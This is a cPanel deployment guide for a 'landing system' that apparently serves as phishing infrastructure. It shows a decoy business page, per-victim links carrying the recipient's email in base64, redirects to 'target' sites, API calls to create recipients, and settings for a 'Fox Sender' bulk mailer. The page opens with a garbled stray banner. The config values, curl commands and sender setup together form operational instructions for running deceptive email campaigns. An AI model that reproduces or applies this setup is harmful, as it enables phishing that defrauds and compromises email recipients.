Simple File Manage Design by index.php

��

# Landing System - cPanel Deployment Guide

## Pre-Deployment Checklist

### 1. Update config.php

Before uploading, edit `config.php` with your settings:

```php
// REQUIRED CHANGES:

// Line 42-44: Change to your business details
define('SITE_NAME', 'Your Business Name');
define('SITE_DOMAIN', 'yourdomain.com');
define('SITE_DESCRIPTION', 'Your business description');

// Line 73: CRITICAL - Change API secret (use a random 32+ character string)
define('API_SECRET', 'YOUR_RANDOM_SECRET_KEY_HERE_MAKE_IT_LONG');

// Line 187: Default redirect URL (fallback if per-recipient URL not set)
define('FINAL_REDIRECT_URL', 'https://your-target-site.com/${emailb64}');

// Lines 113-137: Update decoy content with your business info
```

### 2. Enable HTTPS (Production)

In `.htaccess`, uncomment lines 12-13:
```apache
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
```

---

## cPanel Upload Instructions

### Step 1: Create Subdomain (Recommended)
1. Login to cPanel
2. Go to **Domains** → **Subdomains**
3. Create subdomain like: `secure.yourdomain.com` or `docs.yourdomain.com`
4. Note the document root path (e.g., `/home/user/public_html/secure`)

### Step 2: Upload Files
1. Go to **File Manager** in cPanel
2. Navigate to your subdomain's document root
3. Upload ALL files from the `landing-system` folder:
   ```
   landing-system/
   ├── .htaccess          ← IMPORTANT: Hidden file
   ├── config.php
   ├── index.php
   ├── core/              ← Entire folder
   ├── data/              ← Entire folder
   ├── templates/         ← Entire folder
   └── (don't upload tests/ folder)
   ```

### Step 3: Set Permissions
In File Manager, set these permissions:
```
/data/           → 755 (drwxr-xr-x)
/logs/           → 755 (drwxr-xr-x)
/data/cache/     → 755 (drwxr-xr-x)
```

The system will auto-create these folders if missing.

### Step 4: Verify .htaccess Upload
1. In File Manager, click **Settings** (top right)
2. Check **Show Hidden Files**
3. Verify `.htaccess` exists in root folder

---

## Testing Your Deployment

### Test 1: Basic Access
Visit your landing URL in browser:
```
https://secure.yourdomain.com/
```
You should see a legitimate-looking business page (decoy).

### Test 2: API Connection
In your Sender GUI:
1. Go to **Configuration** → **Landing** tab
2. Enter:
   - **Landing System URL**: `https://secure.yourdomain.com`
   - **API Secret**: (same as in config.php)
3. Click **Test Connection**

### Test 3: Create Test Recipient
Using curl or your sender:
```bash
curl -X POST https://secure.yourdomain.com/api/create \
  -H "Content-Type: application/json" \
  -H "X-API-Secret: YOUR_API_SECRET" \
  -d '{"email":"test@example.com","redirect_url":"https://target.com/$email"}'
```

Response:
```json
{
  "success": true,
  "id": "abc123",
  "landing_url": "https://secure.yourdomain.com/documents/a1b2abc123A1B2/view"
}
```

### Test 4: Visit Landing Page
Visit the landing_url from Test 3 in a browser to verify it shows the landing template.

---

## Sender GUI Configuration

In your Fox Sender GUI, configure:

| Setting | Value |
|---------|-------|
| **Enable Landing** | ✓ ON |
| **Landing System URL** | `https://secure.yourdomain.com` |
| **API Secret** | Same as config.php |
| **Default Template** | document (or your choice) |
| **Auto-Create Recipients** | ✓ ON |

Then in **Email Settings** → **LINK URLS**, add your target URLs:
```
https://++subdom++.yourdomain.com/$++emailb64++
```

---

## Troubleshooting

### Error: 500 Internal Server Error
- Check PHP version (requires 7.4+)
- Check `.htaccess` is uploaded
- Check File Manager → Error Logs

### Error: 404 Not Found
- Verify `.htaccess` exists
- Check mod_rewrite is enabled (most hosts have it)

### API Connection Failed
- Verify API_SECRET matches in both config.php and GUI
- Check HTTPS is working
- Test: `curl https://yourdomain.com/api/health`

### Database Errors
- Check `/data/` folder permissions (755)
- SQLite should auto-create `landing.db`

---

## Security Notes

1. **Never expose** the `/data/` folder - blocked by .htaccess
2. **Never expose** the `/core/` folder - blocked by .htaccess  
3. **Change API_SECRET** to something unique and long
4. **Enable HTTPS** in production
5. **Don't upload** the `tests/` folder to production

---

## Files NOT to Upload

```
❌ tests/           - Test suite (not needed in production)
❌ test_*.php       - Test files
❌ *.md             - Documentation files
❌ .git/            - Git repository
```

## Files Required

```
✓ .htaccess         - URL rewriting & security
✓ config.php        - Configuration
✓ index.php         - Main router
✓ core/             - All PHP modules
✓ data/             - Empty folder (DB will be created)
✓ templates/        - All HTML templates
```